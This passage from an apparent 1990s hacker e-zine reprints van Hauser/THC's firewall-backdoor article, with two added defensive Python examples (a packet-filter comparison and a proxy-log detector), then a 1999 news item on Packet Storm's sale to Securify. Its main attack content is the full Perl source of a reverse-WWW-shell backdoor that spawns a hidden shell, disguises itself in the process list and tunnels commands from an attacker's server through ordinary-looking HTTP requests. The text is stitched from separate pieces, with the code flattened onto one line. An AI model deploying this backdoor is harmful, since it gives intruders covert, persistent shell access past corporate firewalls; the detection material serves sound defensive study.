  active: (re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-) (re-)placing a service/binary on the firewall. This is dangerous because those are audited regularly and sometimes even sniffed on permanent ... Loading a loadable module into the firewall kernel which hides itself and gives access to its master. The best solution for an active backdoor but still dangerous.
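The difference between the first two architectures is easiest to see in code. The following is an added example, not code from the article or from THC: a small evaluator that runs the same constructed packets through a stateless rule table (including the source-port-20 rule mentioned above and an "established" rule that can only look at the ACK bit) and through a filter that keeps a connection table. Addresses, ports and the rules themselves are assumptions made for the demonstration.

```python
"""Stateless packet filter vs. stateful filter, side by side.

Added example, not code from the article or from THC: a small rule
evaluator that models the two architectures. Addresses, ports and the
rule table are constructed for the demonstration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    direction: str          # "in" = internet -> internal net, "out" = reverse
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False


INTERNAL_PREFIX = "10.0.0."   # constructed internal address range


def stateless_decision(pkt):
    """A screening router's static allow table: it has no memory of
    earlier packets, so every decision rests on this packet's header."""
    if pkt.direction == "out":
        return "allow"                          # open outbound policy
    if pkt.dst.startswith(INTERNAL_PREFIX):
        # the active-mode ftp-data rule the article describes:
        # remote source port 20 may reach any internal port above 1023
        if pkt.sport == 20 and pkt.dport > 1023:
            return "allow"
        # an "established" rule on a stateless filter can only look at
        # the ACK bit; any packet carrying it is presumed to belong to a
        # connection the inside already opened
        if pkt.ack:
            return "allow"
    return "deny"


class StatefulFilter:
    """Same policy, but an inbound packet must belong to a connection
    that was opened from the inside (recorded when the outbound SYN passed)."""

    def __init__(self):
        self.connections = set()    # (int_host, int_port, ext_host, ext_port)

    def decision(self, pkt):
        if pkt.direction == "out":
            if pkt.syn and not pkt.ack:
                self.connections.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "allow"
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        return "allow" if key in self.connections else "deny"


def compare(packets):
    """Run one packet sequence through both filters.
    Returns a list of (label, stateless_verdict, stateful_verdict)."""
    stateful = StatefulFilter()
    return [(label, stateless_decision(p), stateful.decision(p))
            for label, p in packets]


SAMPLE = [   # constructed traffic, in arrival order
    ("outbound SYN from a workstation to a web server",
     Packet("out", "10.0.0.5", 40000, "198.51.100.7", 80, syn=True)),
    ("the web server's SYN/ACK coming back",
     Packet("in", "198.51.100.7", 80, "10.0.0.5", 40000, syn=True, ack=True)),
    ("unsolicited SYN from source port 20 to an internal high port",
     Packet("in", "203.0.113.9", 20, "10.0.0.5", 31337, syn=True)),
    ("unsolicited bare ACK aimed at internal port 23",
     Packet("in", "203.0.113.9", 44444, "10.0.0.5", 23, ack=True)),
]

if __name__ == "__main__":
    for label, stateless, stateful in compare(SAMPLE):
        print(f"{label:62s} stateless={stateless:5s} stateful={stateful}")
```

Both filters pass the legitimate web session; only the stateful one refuses the two unsolicited inbound packets, because neither matches a connection the inside opened. That is the whole reason the article's packet-filter tricks (a) and (d) stop working once the filter keeps state.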
  passive: E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed. WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in reality the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell). DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example still needs much coding to be any effective)

----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company. For a better understanding take a look at the following picture and try to remember it onwards in the text:

   +--------+                    +------------+              +-------------+
   |internal|--------------------|  FIREWALL  |--------------|server owned |
   |  host  |  internal network  +------------+   internet   |by the hacker|
   +--------+                                                +-------------+
     SLAVE                                                       MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends its ready signal. The legitimate looking answers of the www server owned by the hacker are in reality the commands the child will execute on its machine in the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching.
Example of a connection:

Slave:
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg HTTP/1.0

Master replies with:
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER).

Some gimmicks: The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; the program masks its name in the process listing ... Best of all: master & slave program are just one 260-line perl file ...

Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect.

Well, why code it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl installed, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://r3wt.base.org for updates.

----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy.
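What the proxy actually records when the reverse WWW shell described above is in use is a series of GETs from one internal client, each carrying a long opaque token instead of a normal query string, repeated at the same time each day. The script below is an added example, not code from the article or from THC: it parses squid's native access.log layout (timestamp, elapsed time, client, status, bytes, method, URL), scores each query string for structure and entropy, and groups hits by internal client rather than by external server, so that rotating the destination host does not hide the pattern. The log lines, addresses and thresholds are constructed for the demonstration.

```python
"""Hunting reverse-WWW-shell style traffic in a proxy access log.

Added example, not code from the article or from THC. It assumes squid's
native access.log layout (timestamp, elapsed, client, status, bytes,
method, URL, ...); the log lines below are constructed.
"""
import math
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone
from urllib.parse import urlsplit

# squid native format: "ts elapsed client code/status bytes method url ..."
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)


def shannon_entropy(text):
    """Bits per character; a base64-like blob scores well above plain words."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line):
    """Return a dict with ts, client, method, host, path, query, or None."""
    m = SQUID_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    return {
        "ts": float(m.group("ts")),
        "client": m.group("client"),
        "method": m.group("method"),
        "host": parts.hostname or "",
        "path": parts.path,
        "query": parts.query,
    }


def is_opaque_query(query, min_len=24, min_entropy=4.0):
    """The tunnel carries its payload as one opaque token after '?':
    long, no key=value structure, high entropy. Thresholds are assumptions."""
    if len(query) < min_len or "=" in query or "&" in query:
        return False
    return shannon_entropy(query) >= min_entropy


def find_suspects(lines, min_hits=3):
    """Group opaque-query GETs by internal client (not by external server,
    so switching the destination host does not hide the pattern) and
    report clients that repeat it, with the minute-of-day they use."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and is_opaque_query(rec["query"]):
            per_client[rec["client"]].append(rec)
    report = {}
    for client, recs in per_client.items():
        if len(recs) < min_hits:
            continue
        stamps = [datetime.fromtimestamp(r["ts"], timezone.utc) for r in recs]
        report[client] = {
            "hits": len(recs),
            "hosts": sorted({r["host"] for r in recs}),
            "paths": sorted({r["path"] for r in recs}),
            "minutes": sorted({s.strftime("%H:%M") for s in stamps}),
            "days": len({s.date() for s in stamps}),
        }
    return report


SAMPLE_LOG = [  # constructed lines; timestamps fall on 1999-08-19/20 UTC
    "935020860.412    215 10.0.0.5 TCP_MISS/200 318 GET http://203.0.113.9:8080/cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg - DIRECT/203.0.113.9 text/html",
    "935020875.003    190 10.0.0.5 TCP_MISS/200 301 GET http://203.0.113.9:8080/cgi-bin/order?g5mAlfbknzQrTxVd8LpW2cKsJhN4yE1uBoGvZa6MiRfC - DIRECT/203.0.113.9 text/html",
    "935040000.001    120 10.0.0.8 TCP_MISS/200 15234 GET http://www.example.com/search?q=firewall+architecture - DIRECT/192.0.2.10 text/html",
    "935040012.550     90 10.0.0.8 TCP_HIT/200 4021 GET http://www.example.com/session?sid=8f3a9c2e1b7d - NONE/- text/html",
    "935040100.200     75 10.0.0.8 TCP_HIT/200 2210 GET http://www.example.com/ - NONE/- text/html",
    "935107260.118    230 10.0.0.5 TCP_MISS/200 322 GET http://203.0.113.44/cgi-bin/order?Kd7pWq2ZxRt9LmBv4HcNyE6sJaGfU1oXiT3QeVbPkMzS - DIRECT/203.0.113.44 text/html",
    "935107277.640    205 10.0.0.5 TCP_MISS/200 298 GET http://203.0.113.44/cgi-bin/order?Vn3HsTq8RbYw5LcJm2XpDfK7GzAeUi9NoC1ZtMxE4QgW - DIRECT/203.0.113.44 text/html",
    "# not a log line",
]

if __name__ == "__main__":
    for client, info in find_suspects(SAMPLE_LOG).items():
        print(client, info)
```

Run against the constructed log, the only client reported is 10.0.0.5, with four hits against two different external hosts, one path, one minute of the day (00:01) and two distinct days; the ordinary browsing from 10.0.0.8 never qualifies because its query strings are key=value pairs or absent. On a real proxy the thresholds want tuning per site, and the minute-of-day field is the strongest signal to pivot on, since the daily reconnect is fixed in the slave's configuration.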
Email should be put on a centralized mail server, DNS resolving only done on the WWW/FTP proxies, and access to WWW only with prior proxy authentication. However, this is not enough. An attacker can tamper with the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regularly with good tools can be defeated by switching the external servers every 3-20 calls or using aliases. A secure solution would be to set up a second network which is connected to the internet, and the real one kept separated - but tell this to the employees ... A good firewall is a big improvement, and also an Intrusion Detection System can help. But nothing can stop a dedicated attacker.

----[ Last Words

Have fun hacking/securing the systems ... Greets to all guys who like + know me ;-) and especially to those good chummers I've got, you know who you are.

Ciao...
van Hauser / [THC] - The Hacker's Choice

For further interesting discussions you can email me at vh@reptile.rug.be with my public pgp key below :

Type Bits/KeyID    Date       User ID
pub  2048/CDD6A571 1998/04/27 van Hauser / THC

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- ----[ THE CODE <++> rwwwshell.pl #!/usr/bin/perl # Reverse-WWW-Tunnel-Backdoor v1.5 # (c) 1998 by van Hauser / [THC] - The Hacker's Choice # Check out http://r3wt.base.org for updates # # GENERAL CONFIG (except for $MASK, everything must be the same # for MASTER and SLAVE is this section!) # $CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char! $MASK="vi"; # for masking the program's process name $PASSWORD="THC"; # anything, nothing you have to rememeber # (not a real "password" anyway) # # MASTER CONFIG (specific for the MASTER) # $LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) $SERVER="localhost"; # the host to run on (ip/dns) (the SLAVE needs this!) # # SLAVE CONFIG (specific for the SLAVE) # $SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) $DELAY="3"; # time to wait for output after your command(s) $TIME="00:01"; # time when to connect to the master (unset if now) $DAILY="sure"; # tries to connect once daily if set with something $PROXY=""; # set this with the Proxy if you must use one $PROXY_PORT=""; # set this with the Proxy Port if you must use one # END OF CONFIG # nothing for you to do after this point # ################## BEGIN MAIN CODE ################## require 5.002; use Socket; $|=1; # next line changes our process name if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } undef $DAILY if (! 
$TIME); if ( !($PROXY) || !($PROXY_PORT) ) { undef $PROXY; undef $PROXY_PORT; } $protocol = getprotobyname('tcp'); if ($ARGV[0] ne "") { if ($ARGV[0] eq "-h") { print STDOUT "no commandline option : daemon mode\n"; print STDOUT "using \"-h\" as option : this help\n"; print STDOUT "any other option : slave mode\n"; exit(0); } else { print STDOUT "starting in slave mode\n"; $SLAVE_MODE = "yeah"; } } if (! $SLAVE_MODE) { &master; } else { &slave; } # END OF MAIN FUNCTION ############### SLAVE FUNCTION ############### sub slave { $pid = 0; if ($PROXY) { # setting the real config (for Proxy Support) $REAL_SERVER = $PROXY; $REAL_PORT = $PROXY_PORT; $REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT . $CGI_PREFIX; } else { $REAL_SERVER = $SERVER; $REAL_PORT = $LISTEN_PORT; $REAL_PREFIX = "GET " . $CGI_PREFIX; } AGAIN: if ($pid) { kill 9, $pid; } if ($TIME) { # wait until the specified $TIME $TIME =~ s/^0//; $TIME =~ s/:0/:/; (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time); $t=$hour . ":" . $min; while ($TIME ne $t) { sleep(28); # every 28 seconds we look at the watch (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time); $t=$hour . ":" .$min; } } if ($DAILY) { # if we must connect daily, we if (fork) { # we fork the daily shell process sleep(69); # to ensure the master control proc. goto AGAIN; # won't get stuck by a fucking cmd } # the user executed. } $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; $remote = sockaddr_in($REAL_PORT, $address); $forked = 0; GO: close(THC); socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n"; setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); if (! $forked) { # fork failed? fuck, let's try again pipe R_IN, W_IN; select W_IN; $|=1; pipe R_OUT, W_OUT; select W_OUT; $|=1; $pid = fork; if (! defined $pid) { close THC; close R_IN; close W_IN; close R_OUT; close W_OUT; goto GO; } $forked = 1; } if (! 
$pid) { # this is the child process (execs $SHELL) close R_OUT; close W_IN; close THC; open STDIN, "<&R_IN"; open STDOUT, ">&W_OUT"; open STDERR, ">&W_OUT"; exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; close R_IN; close W_OUT; exit(0); } else { # this is the parent (data control + network) close R_IN; sleep($DELAY); # we wait $DELAY for the commands to complete vec($rs, fileno(R_OUT), 1) = 1; select($r = $rs, undef, undef, 30); sleep(1); $output = ""; vec($ws, fileno(W_OUT), 1) = 1; while (select($w = $ws, undef, undef, 1)) { read R_OUT, $readout, 1 || last; $output = $output . $readout; } print W_OUT "\000" || goto END; while (1) { read R_OUT, $readout, 1 || last; last if ($readout eq "\000"); $output = $output . $readout; } &uuencode; # does the encoding of the shell output $encoded = $REAL_PREFIX . $encoded . "\n"; connect(THC, $remote) || goto END; # connect to master send (THC, $encoded, 0) || goto END; # and send data $input = ""; vec($rt, fileno(THC), 1) = 1; # wait until master sends reply while (! select($r = $rt, undef, undef, 0.00001)) {} while (1) { # read until EOD (End Of Data) recv (THC, $readin, 1, 0) || goto OK; goto OK if (($readin eq "\000") or ($readin eq "\n") or ($readin eq "")); $input = $input . $readin; } OK: $input =~ s/\n//gs; &uudecode; # decoding the data from the master goto END if ( $decoded =~ m/^$PASSWORD/s == 0); $decoded =~ s/^$PASSWORD//; print W_IN "$decoded" || goto END; # sending the data sleep(1); # to the shell proc. goto GO; } END: kill 9, $pid; $pid = 0; exit(0); } # END OF SLAVE FUNCTION ############### MASTER FUNCTION ############### sub master { socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n"; setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; listen(THC, 3) || die "can't listen\n"; # print the HELP print STDOUT ' Welcome to the Reverse-WWW-Tunnel-Backdoor v1.4 by van Hauser / THC ... 
Introduction: Wait for your SLAVE to connect, examine it\'s output and then type in your commands to execute on SLAVE. You\'ll have to wait min. the set $DELAY seconds before you get the output and can execute the next stuff. Use ";" for multiple commands. Trying to execute interactive commands may give you headache so beware. Your SLAVE may hang until the daily connect try (if set - otherwise you lost). You also shouldn\'t try to view a binary data too ;-) "echo bla >> file", "cat >> file <<- EOF", sed etc. are your friends if you don\'t like using vi in a delayed line mode ;-) To exit this program on any time without doing harm to either MASTER or SLAVE just press Control-C. Now have fun. '; YOP: print STDOUT "\nWaiting for connect ..."; $remote=accept (S, THC) || goto YOP; # get the connection ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE $slave=gethostbyaddr($r_slave, AF_INET); # data. $slave="unresolved" if ($slave eq ""); print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; select S; $|=1; select STDOUT; $|=1; $input = ""; vec($socks, fileno(S), 1) = 1; while (1) { # read the data sent by the slave while (! select($r = $socks, undef, undef, 0.00001)) {} recv (S, $readin, 80, 0) || print STDOUT "disconnected\n"; $readin =~ s/\r//g; $input = $input . $readin; last if ( $input =~ m/\n\n/s ); } &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); $input =~ s/^.*($CGI_PREFIX)\??//s; $input =~ s/\n.*$//s; &uudecode; # decoding the data from the slave &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); $decoded =~ s/^$PASSWORD//s; $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); print STDOUT "$decoded"; # showing the slave output to the user $output = ; # and get his input. 
&uuencode; # encode the data for the slave send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it close (S); print STDOUT "sent.\n"; goto YOP; # wait for the next connect from the slave } # END OF MASTER FUNCTION ###################### MISC. FUNCTIONS ##################### sub uuencode { # does the encoding stuff for error-free data transfer via WWW $output = $PASSWORD . $output; # PW is for error checking and $uuencoded = pack "u", "$output"; # preventing sysadmins from $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird /'zcadefghjklmnopqrstuv' # data. No real /; # security! $uuencoded =~ tr/"'"/'b'/; if ( ($PROXY) && ($SLAVE_MODE) ) {# a proxy drops the request if > 8kb $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; $cut_length = 4099 - (length $REAL_PREFIX); $uuencoded = pack "a$cut_length", $uuencoded if ($codelength > 4111); } $encoded = $uuencoded; $encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE); } # END OF UUENCODE FUNCTION sub uudecode { # does the decoding of the data stream $input =~ tr/'zcadefghjklmnopqrstuv' /'\n)=(:;&><,#$*%]!\@"`\\\-' /; $input =~ tr/'b'/"'"/; $decoded = unpack "u", "$input"; } # END OF UUDECODE FUNCTION sub hide_as_broken_webserver { # invalid request -> look like broken server send (S, "\n404 File Not Found\n". "\n

File Not Found

\n\n", 0); close S; print STDOUT "Warning! Illegal server access!\n"; # report to user goto YOP; } # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION # END OF PROGRAM # (c) 1998 by <--> ----[ EOF --- CUT HERE --- Ciao... van Hauser / THC - [The Hacker's Choice] THC's Webpage -> http://merlin.koeln-net.com/~plasmoid/thc Type Bits/KeyID Date User ID pub 2048/CDD6A571 1998/04/27 van Hauser / THC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD /3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN 1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- @HWA 08.0 PacketStorm Security Sells Out? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Who's going to pick up the slack now that Ken has removed himself from affiliation with Packet Storm? the following sounds well and good but will this company (Securify) have the same contacts and receive updates as frequently as Ken used to? 
I doubt it... well, it looks like PSS will be relegated to being just an archive of old security tools and exploits. Hopefully the new system will at least do the old one some justice and preserve the layout; meanwhile we wish Ken Williams the best of luck in his new job, whatever that may be.... - Ed

From HNN http://www.hackernews.com

Packet Storm Moves to Kroll-O'Gara

contributed by jkw
As mentioned in the HNN rumors section last week Ken Williams has sold the rights to Packet Storm Security to Securify, the Information Security Group of The Kroll-O'Gara Company. Ken Williams will no longer be running the site and has accepted a different job within the Information Security industry. Securify hopes to have the site operational and online sometime in September.

Old PSS - With Letter from Ken Williams and Securify Press Release
New PSS
http://www.securify.com/packetstorm/

Late Update
Wow, this made it into the New York Times.

NY Times - Registration Required
http://www.nytimes.com/library/tech/99/08/biztech/articles/17secure.html

August 17, 1999

Security Firm to Revive Computer-Defense Site

By PETER WAYNER

Kroll-O'Gara, the international security consulting firm, said Monday it would take over an Internet site that not only posted information about defending computer systems against attacks but also told how to break into them.

In the shadowy world of hackers and crackers, it is often hard to tell the good guys from the bad. Computer-security experts frequently test systems by breaking into them, and the site, Packet Storm, posted descriptions of those break-ins.

Kroll-O'Gara's computer security unit, Securify, which declined to discuss financial terms of its acquisition, said it planned to maintain the site's tradition of high-quality information as a way to market its services. But Kroll-O'Gara executives said that it would rid the site of its more contentious publications.
"We see it, from a corporate standpoint, as somewhat risky and controversial," Charles Breed, Securify's vice president for marketing, acknowledged. "We'll be publishing a site with very powerful tools and they can be used for good or evil. Our opinion is that it's better to make knowledge available than keeping it obscure or hidden." Tommy Ward, a project manager at Securify, said three Securify employees would comb through the site, "sanitizing content." Until late June, Harvard University provided Packet Storm as a service and picked up the costs of answering requests for more than 10 gigabytes of data traffic a day. The site, which was edited by Ken Williams, a security consultant not associated with the university, proved popular with many computer experts because it collected detailed technical information about the methods intruders use to exploit weaknesses in computers. These often-fascinating narratives were mixed with discussions about how to help systems withstand assault. Harvard dropped the site in late June after the host of a rival site complained that Packet Storm had posted defamatory information. Joe Wrinn, a university spokesman, said, "We're happy that the site will be online again. That's the original reason we got involved." Williams called the site "a labor of love," but said it was taking 60 to 80 hours a week to maintain. He will not be associated with the site, which will be run by Securify employees at Securify.com. Since Harvard pulled the plug, the site has been inaccessible; computer professionals looked forward to its relaunch, expected in late September. "I'm glad that the compendium of information is going to be preserved," said Adam Shostack, a computer security consultant. -=- Here's the index.html file from the original location of PacketStorm Security with Ken's message and the Securify press release... 
-=- http://www.genocide2600.com/~tattooman/index.html To The Supporters of Packet Storm Security: As you may already be aware, there have been numerous rumors on the Net recently regarding the revival of Packet Storm Security through corporate sponsorship. I am pleased to announce that the rumours are indeed true, and that Packet Storm will now be hosted by Securify, the Information Security Group of Kroll-O'Gara. I have carefully considered the direction and future of PSS since it was taken down by Harvard, and have entertained innumerable offers from a wide variety of corporate, non-profit, and private entities to host the site. Kroll-O'Gara has presented me with the most impressive vision and plans for PSS. Not only does Kroll-O'Gara intend to preserve the original ideals and intent of PSS, but they have developed an exciting and definitive roadmap for the logical evolution of the site. Packet Storm Security had reached a stage where it was much more than a full time job for one person. For the last year I have been working a minimum of 60 hours a week to maintain the high quality of the site. In order to sustain my vision of PSS as *the* resource on the Internet for freeware Information Security tools, it became necessary to acquire the resources that only a dedicated corporate sponsor could provide. I have talked at length with Matt Barrie (PSS Program Manager) at Kroll-O'Gara ISG, and I believe that they have grand and noble goals for the future of Packet Storm Security. Unfortunately, I will not be with PSS in the future, however, because I have recently accepted an extremely enticing offer elsewhere in the Information Security industry. I do, nevertheless, give my strongest support to the new maintainers of the site, and I'm excited about what's in store for the future of PSS. To all of my valued friends and supporters of the site: I sincerely hope that you too will continue through your contributions and suggestions to help make Packet Storm what it was! 
Your support has been and will continue to be invaluable in ensuring that PSS is *the* resource for freeware Information Security tools.

Respectfully,

Ken Williams
Founder
Packet Storm Security

********** PRESS RELEASE **********

For more information, contact:

Vicky Wu                      Charles Breed
PR Manager                    VP of Marketing
KVO Public Relations          Securify, Kroll-O'Gara Company
(650) 919-2027                (650) 812-9400 x107
vicky_ku@kvo.com              cbreed@securify.com

Matt Barrie
matt@securify.com
packetstorm@securify.com

KROLL-O'GARA INFORMATION SECURITY GROUP ACQUIRES PACKET STORM, THE PREMIER WEB SITE FOR INFORMATION SECURITY TOOLS & DATA

Packet Storm Security is positioned to be the Internet's largest single source for computer security threat information, tools and patches

PALO ALTO, Calif., August, 17, 1999 In response to the growing demand for current and accurate information and tools on computer security, Securify, the Information Security Group of The Kroll-O'Gara Company (Nasdaq: KROG), announced today the acquisition of Packet Storm Security; a website created and maintained by Ken Williams, a renowned computer security expert. Averaging over 400,000 hits per day, generating over 7 gigabytes of traffic, Packet Storm Security is an established resource for many government agencies and major corporations.

"Packet Storm Security provides a strong, long term Internet presence for Securify," states Dr. Taher Elgamal, President of Securify. "It is a state of the art resource for our customers and we see it as the nucleus for a number of exciting additional security management services."

Packet Storm is one of the largest and most well recognized information security resources on the Internet today. The site consists of over 45,000 security related programs, such as up to date tools, patches, advisories, vulnerabilities.
Considering this massive repository of information, Packet Storm Security is the ideal site for finding up-to-date information on the latest threats that face corporate networks and computer systems. This site has been frequented by system administrators, engineers, programmers, from organizations such as AT&T, DoD, NSA, FBI, IBM, Microsoft, GTE, ISS, KPMG, E&Y, InterNIC, Alcatel, NCSC, McAfee, NIST, USAF, Sprint CA, UK Govt., Mitre, Allied Signal, and CitiGroup bank.

"Our customers have asked for a single source data point to inform and educate them on the ever increasing number of information security threats," states Jules Kroll, CEO and Chairman of Kroll-O'Gara Inc. "We will be dedicating a significant effort to making this site extremely useful for anyone involved with computer security."

Packet Storm Security is in the process of being updated and refined prior to being posted in September at http://www.securify.com/packetstorm

# # #

About Securify, the Information Security Group of Kroll-O'Gara

